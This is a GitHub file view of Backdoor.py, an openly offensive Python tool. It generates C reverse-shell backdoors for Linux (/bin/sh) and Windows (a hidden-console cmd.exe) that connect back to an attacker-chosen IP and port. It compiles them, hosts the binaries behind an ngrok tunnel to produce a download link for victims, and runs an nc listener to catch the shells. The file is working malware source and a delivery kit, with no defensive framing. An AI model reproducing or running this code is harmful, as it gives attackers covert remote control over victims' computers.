-
Notifications
You must be signed in to change notification settings - Fork 0
/
Backdoor.py
151 lines (126 loc) · 4.72 KB
/
Backdoor.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
from subprocess import check_output
from time import sleep
import os
import sys
import http.server
import socket
import re
print("Start Attacks Backdoor :D")
sleep(2)
def choice():
print("""
[\033[1;39m1\033[1;36m] linux
[\033[1;39m2\033[1;36m] windows
[\033[1;39m3\033[1;36m] Listening Connection
[\033[1;39m4\033[1;36m] Exit
""")
options = input("\033[1;39mSelect Your Target System : \033[1;39m")
if (options == '1'):
host = input("\n\033[1;36mIP: \033[1;39m")
port = input("\n\033[1;36mPORT: \033[1;39m")
linux_shell(host, port)
os.system("gcc .linux.c -o LinuxBackDoor -pthread && rm -rf .linux.c")
os.system("chmod +x LinuxBackDoor")
print("\n\033[1;36mFile Saved > \033[1;39mLinuxBackDoor")
os.system("python3 -m http.server 80 > .server 2> /dev/null &")
os.system("chmod +x ngrok")
name1 = "/LinuxBackDoor"
portN = 80
os.system("./ngrok http {} > /dev/null &".format(portN))
sleep(8)
os.system('curl -s -N http://127.0.0.1:4040/api/tunnels | grep "https://[0-9a-z]*\.ngrok.io" -oh > link2.url')
urlFile = open('link2.url', 'r')
url = urlFile.read()
urlFile.close()
if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
print("\n\033[1;36mLINK : \033[1;39m", url + name1)
print(" ")
if (options == '2'):
host = input("\n\033[1;36mIP: \033[1;39m")
port = input("\n\033[1;36mPORT: \033[1;39m")
windows_reverse(host, port)
os.system(
"/usr/bin/i686-w64-mingw32-gcc .windows.c -o windows.exe -lws2_32 && rm -rf .windows.c")
print("\n\033[1;36mFile Saved > \033[1;39mwindowsBackdoor")
os.system("python3 -m http.server 80 > .server 2> /dev/null &")
os.system("chmod +x ngrok")
name2 = "/Windows.exe"
portN = 80
os.system("./ngrok http {} > /dev/null &".format(portN))
sleep(8)
os.system('curl -s -N http://127.0.0.1:4040/api/tunnels | grep "https://[0-9a-z]*\.ngrok.io" -oh > link2.url')
urlFile = open('link2.url', 'r')
url = urlFile.read()
urlFile.close()
if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
print("\n\033[1;36mLINK : \033[1;39m", url + name2)
print(" ")
if (options == '3'):
port = input("\n\033[1;36mPORT: \033[1;39m")
print("\n\033[1;36mWaiting For Connection ...\n")
os.system("nc -l -p %s" % port)
print("\033[1;36m")
if (options == '4'):
sys.exit()
os.system("fuser -k -n tcp 80")
else:
choice()
def linux_shell(host, port):
with open(".linux.c", "w") as file:
file.write('''
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
int main (int argc, char **argv)
{
int scktd;
struct sockaddr_in client;
client.sin_family = AF_INET;
client.sin_addr.s_addr = inet_addr("%s");
client.sin_port = htons(%s);
scktd = socket(AF_INET,SOCK_STREAM,0);
connect(scktd,(struct sockaddr *)&client,sizeof(client));
dup2(scktd,0); // STDIN
dup2(scktd,1); // STDOUT
dup2(scktd,2); // STDERR
execl("/bin/sh","sh","-i",NULL,NULL);
return 0;
}
''' % (host, port))
def windows_reverse(host, port):
with open(".windows.c", "w") as file:
file.write('''
#include <winsock2.h>
#include <stdio.h>
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#pragma comment(lib,"ws2_32")
WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;
char ip_addr[16];
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
//int main(int argc, char *argv[])
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdParam, int iCmdShow)
{
FreeConsole();
WSAStartup(MAKEWORD(2,2), &wsaData);
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
struct hostent *host;
host = gethostbyname("''' + host + '''");
strcpy(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));
hax.sin_family = AF_INET;
hax.sin_port = htons(atoi("''' + port + '''"));
hax.sin_addr.s_addr = inet_addr(ip_addr);
WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL);
memset(&ini_processo,0,sizeof(ini_processo));
ini_processo.cb=sizeof(ini_processo);
ini_processo.dwFlags=STARTF_USESTDHANDLES;
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,CREATE_NO_WINDOW,NULL,NULL,&ini_processo,&processo_info);
}
''')
if __name__ == '__main__':
choice()